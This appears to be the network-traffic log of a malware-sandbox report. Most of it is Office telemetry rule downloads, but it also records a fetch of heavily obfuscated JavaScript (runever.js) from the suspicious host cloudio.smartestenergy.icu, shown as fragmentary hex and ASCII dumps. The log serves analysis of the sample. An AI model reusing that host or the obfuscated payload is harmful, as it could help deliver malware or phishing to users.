2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:29 UTC	378	OUT	GET /hustines/luketurg/runever.js HTTP/1.1 Host: cloudio.smartestenergy.icu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:30 UTC	429	IN	HTTP/1.1 200 OK etag: "1b7a1-673ac020-13cf93;;;" last-modified: Mon, 18 Nov 2024 04:18:40 GMT content-type: text/javascript content-length: 112545 accept-ranges: bytes date: Tue, 26 Nov 2024 12:43:29 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-11-26 12:43:30 UTC	16384	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 63 33 35 64 30 2c 5f 30 78 65 65 32 30 32 33 29 7b 63 6f 6e 73 74 20 5f 30 78 33 31 65 37 63 39 3d 5f 30 78 32 34 64 35 2c 5f 30 78 34 30 66 31 30 61 3d 5f 30 78 33 63 33 35 64 30 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 34 36 62 34 34 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 65 37 63 39 28 30 78 32 35 66 29 29 2f 28 2d 30 78 32 62 39 2b 2d 30 78 31 30 33 2a 2d 30 78 37 2b 30 78 34 35 62 2a 2d 30 78 31 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 65 37 63 39 28 30 78 32 66 36 29 29 2f 28 30 78 32 2a 30 78 31 33 33 34 2b 30 78 31 32 38 31 2b 2d 30 78 33 38 65 37 2a 30 78 31 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 65 37 63 39 28 30 78 32 65 37 29 Data Ascii: (function(_0x3c35d0,_0xee2023){const _0x31e7c9=_0x24d5,_0x40f10a=_0x3c35d0();while(!![]){try{const _0x546b44=parseInt(_0x31e7c9(0x25f))/(-0x2b9+-0x103-0x7+0x45b-0x1)+-parseInt(_0x31e7c9(0x2f6))/(0x20x1334+0x1281+-0x38e70x1)*(-parseInt(_0x31e7c9(0x2e7)
2024-11-26 12:43:30 UTC	16384	IN	Data Raw: 35 36 64 64 66 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 39 30 39 38 35 2a 5f 30 78 35 36 64 64 66 31 3b 7d 2c 27 4e 62 64 6a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 39 33 64 31 32 2c 5f 30 78 35 35 38 34 31 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 39 33 64 31 32 28 5f 30 78 35 35 38 34 31 33 29 3b 7d 2c 27 6e 67 73 50 48 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 64 65 33 64 36 36 2c 5f 30 78 35 32 63 62 64 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 64 65 33 64 36 36 2b 5f 30 78 35 32 63 62 64 35 3b 7d 2c 27 73 4f 49 6e 71 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 38 37 39 63 2c 5f 30 78 32 62 64 35 31 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 32 38 37 39 63 28 5f 30 78 32 62 64 35 31 31 29 3b 7d 2c 27 54 78 78 6f 58 27 3a 66 75 6e 63 74 69 6f Data Ascii: 56ddf1){return _0x190985*_0x56ddf1;},'Nbdjp':function(_0x293d12,_0x558413){return _0x293d12(_0x558413);},'ngsPH':function(_0xde3d66,_0x52cbd5){return _0xde3d66+_0x52cbd5;},'sOInq':function(_0x12879c,_0x2bd511){return _0x12879c(_0x2bd511);},'TxxoX':functio
2024-11-26 12:43:30 UTC	16384	IN	Data Raw: 29 2c 2d 28 30 78 31 2a 30 78 31 65 66 37 2b 30 78 62 2a 2d 30 78 61 37 2b 2d 30 78 31 37 63 39 29 29 2c 2d 28 2d 30 78 31 65 33 34 2b 30 78 34 66 35 2b 2d 30 78 31 33 2a 2d 30 78 31 63 37 29 29 2c 5f 30 78 34 61 32 33 62 36 5b 5f 30 78 61 38 63 63 32 35 28 30 78 34 38 32 29 5d 28 30 78 31 2a 2d 30 78 62 66 33 2b 2d 30 78 32 2a 30 78 33 63 37 2b 30 78 31 33 38 33 2c 30 78 65 30 35 2b 2d 30 78 31 35 62 2a 2d 30 78 32 2b 2d 30 78 34 64 61 29 29 2c 5f 30 78 34 61 32 33 62 36 5b 5f 30 78 61 38 63 63 32 35 28 30 78 32 66 63 29 5d 28 5f 30 78 34 61 32 33 62 36 5b 5f 30 78 61 38 63 63 32 35 28 30 78 32 37 37 29 5d 28 2d 28 2d 30 78 32 32 2a 2d 30 78 32 39 2b 30 78 64 39 61 2a 2d 30 78 33 2b 30 78 31 2a 30 78 33 38 36 37 29 2c 5f 30 78 34 61 32 33 62 36 5b 5f 30 Data Ascii: ),-(0x10x1ef7+0xb-0xa7+-0x17c9)),-(-0x1e34+0x4f5+-0x13-0x1c7)),_0x4a23b6[_0xa8cc25(0x482)](0x1-0xbf3+-0x20x3c7+0x1383,0xe05+-0x15b-0x2+-0x4da)),_0x4a23b6[_0xa8cc25(0x2fc)](_0x4a23b6[_0xa8cc25(0x277)](-(-0x22-0x29+0xd9a-0x3+0x1*0x3867),_0x4a23b6[_0
2024-11-26 12:43:30 UTC	16384	IN	Data Raw: 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 62 38 29 2c 27 67 43 62 77 64 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 34 64 29 2c 27 47 6e 45 6f 47 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 37 36 29 2c 27 51 62 47 4d 4a 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 32 36 33 29 2c 27 74 71 78 56 43 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 33 38 29 2c 27 51 6a 48 64 5a 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 32 37 39 29 2c 27 47 52 6f 74 63 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 63 32 29 2c 27 4b 71 75 5a 77 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 38 30 29 2c 27 69 51 69 67 54 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 38 61 29 2c 27 64 67 72 6e 55 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 37 30 29 2c 27 63 41 54 4d 62 27 3a 5f 30 78 33 Data Ascii: :_0x33d9be(0x4b8),'gCbwd':_0x33d9be(0x34d),'GnEoG':_0x33d9be(0x376),'QbGMJ':_0x33d9be(0x263),'tqxVC':_0x33d9be(0x438),'QjHdZ':_0x33d9be(0x279),'GRotc':_0x33d9be(0x4c2),'KquZw':_0x33d9be(0x380),'iQigT':_0x33d9be(0x38a),'dgrnU':_0x33d9be(0x470),'cATMb':_0x3
2024-11-26 12:43:30 UTC	16384	IN	Data Raw: 6d 46 27 2c 27 6c 67 62 42 54 27 2c 27 63 75 53 77 69 27 2c 27 4a 44 66 57 63 27 2c 27 69 7a 51 72 4c 27 2c 27 6e 6c 69 6e 65 2f 66 6c 2f 27 2c 27 62 4e 76 6b 75 27 2c 27 31 30 6f 7a 50 68 77 52 27 2c 27 4b 54 6e 45 78 27 2c 27 79 64 6f 64 50 27 2c 27 33 35 36 37 39 37 38 54 70 54 27 2c 27 4f 6f 57 6a 47 27 2c 27 55 44 5a 78 67 27 2c 27 63 46 7a 70 57 27 2c 27 51 6a 66 42 78 27 2c 27 75 48 43 6b 74 27 2c 27 6d 74 51 4d 75 27 2c 27 78 41 61 55 4f 27 2c 27 48 46 58 57 55 27 2c 27 77 44 58 76 53 27 2c 27 62 6f 72 64 65 72 27 2c 27 35 34 36 35 64 4f 6e 78 6d 73 27 2c 27 4e 74 4e 6d 74 27 2c 27 64 61 74 61 5d 27 2c 27 56 66 44 75 6a 27 2c 27 72 59 68 6f 4a 27 2c 27 4c 41 69 6d 45 27 2c 27 6a 76 67 42 54 27 2c 27 57 53 6c 65 67 27 2c 27 61 59 53 55 71 27 2c 27 Data Ascii: mF','lgbBT','cuSwi','JDfWc','izQrL','nline/fl/','bNvku','10ozPhwR','KTnEx','ydodP','3567978TpT','OoWjG','UDZxg','cFzpW','QjfBx','uHCkt','mtQMu','xAaUO','HFXWU','wDXvS','border','5465dOnxms','NtNmt','data]','VfDuj','rYhoJ','LAimE','jvgBT','WSleg','aYSUq','
2024-11-26 12:43:30 UTC	16384	IN	Data Raw: 38 39 2b 30 78 33 65 30 2a 2d 30 78 32 2b 28 2d 30 78 64 65 31 2b 2d 30 78 34 2a 2d 30 78 37 30 36 2b 2d 30 78 65 33 34 29 2a 28 30 78 31 32 33 30 2b 30 78 34 64 30 2b 2d 30 78 31 32 39 33 29 2b 2d 28 30 78 34 31 66 2a 30 78 31 2b 30 78 64 2a 30 78 32 61 66 2b 2d 30 78 31 34 39 35 29 29 5d 3d 5f 30 78 66 62 36 38 32 66 28 2d 28 30 78 63 63 34 2b 30 78 32 34 37 2a 30 78 64 2b 2d 30 78 31 65 64 2a 30 78 31 36 29 2a 2d 28 30 78 32 32 62 31 2b 2d 30 78 34 36 39 2b 30 78 31 2a 2d 30 78 66 30 37 29 2b 28 30 78 39 37 2a 30 78 31 66 2b 30 78 32 34 33 30 2b 2d 30 78 33 36 37 37 29 2a 28 30 78 31 64 64 30 2b 30 78 32 33 61 31 2b 30 78 35 2a 2d 30 78 39 34 33 29 2b 2d 28 2d 30 78 33 62 66 2a 2d 30 78 31 34 2b 2d 30 78 35 36 61 35 2b 30 78 34 30 36 38 29 29 2c 69 66 Data Ascii: 89+0x3e0-0x2+(-0xde1+-0x4-0x706+-0xe34)(0x1230+0x4d0+-0x1293)+-(0x41f0x1+0xd0x2af+-0x1495))]=_0xfb682f(-(0xcc4+0x2470xd+-0x1ed0x16)-(0x22b1+-0x469+0x1-0xf07)+(0x970x1f+0x2430+-0x3677)(0x1dd0+0x23a1+0x5-0x943)+-(-0x3bf*-0x14+-0x56a5+0x4068)),if
2024-11-26 12:43:30 UTC	14241	IN	Data Raw: 2c 2d 30 78 31 2a 30 78 31 33 62 65 2b 30 78 65 39 63 2b 30 78 35 66 39 29 2c 5f 30 78 35 36 37 31 64 36 5b 5f 30 78 34 34 36 31 64 61 28 30 78 33 33 35 29 5d 28 30 78 31 30 36 2a 30 78 31 31 2b 30 78 34 64 33 2a 2d 30 78 32 2b 2d 30 78 37 38 63 2c 30 78 32 36 65 31 2b 2d 30 78 33 61 31 2a 30 78 33 2b 2d 30 78 31 62 34 37 29 29 29 29 5d 28 29 3b 7d 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 66 62 36 38 32 66 28 2d 30 78 31 2a 2d 30 78 31 31 35 33 2b 30 78 32 2a 30 78 38 62 37 2b 2d 30 78 31 65 65 61 2b 2d 28 30 78 39 31 2a 2d 30 78 33 31 2b 2d 30 78 34 37 2a 30 78 38 39 2b 2d 30 78 32 38 30 64 2a 2d 30 78 32 29 2b 28 2d 30 78 31 36 36 2a 2d 30 78 31 30 2b 2d 30 78 31 61 65 62 2b 30 78 34 2a 30 78 33 66 31 29 29 2b 5f 30 78 66 62 36 38 32 66 28 2d 28 30 78 Data Ascii: ,-0x10x13be+0xe9c+0x5f9),_0x5671d6[_0x4461da(0x335)](0x1060x11+0x4d3-0x2+-0x78c,0x26e1+-0x3a10x3+-0x1b47))))]();}),document[_0xfb682f(-0x1-0x1153+0x20x8b7+-0x1eea+-(0x91-0x31+-0x470x89+-0x280d-0x2)+(-0x166-0x10+-0x1aeb+0x4*0x3f1))+_0xfb682f(-(0x

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:30 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:30 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:30 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124330Z-174f7845968swgbqhC1EWRmnb40000000vmg000000006v8t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:30 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:30 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:30 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:30 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124330Z-174f7845968j6t2phC1EWRcfe80000000vm0000000007yyy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:30 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:30 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:30 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:30 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124330Z-174f7845968cdxdrhC1EWRg0en0000000vcg000000008p8u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:30 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:30 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:30 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:30 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124330Z-174f7845968swgbqhC1EWRmnb40000000vk0000000008m55 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:30 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:30 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:30 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:30 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124330Z-174f78459685m244hC1EWRgp2c0000000v90000000007bet x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:30 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

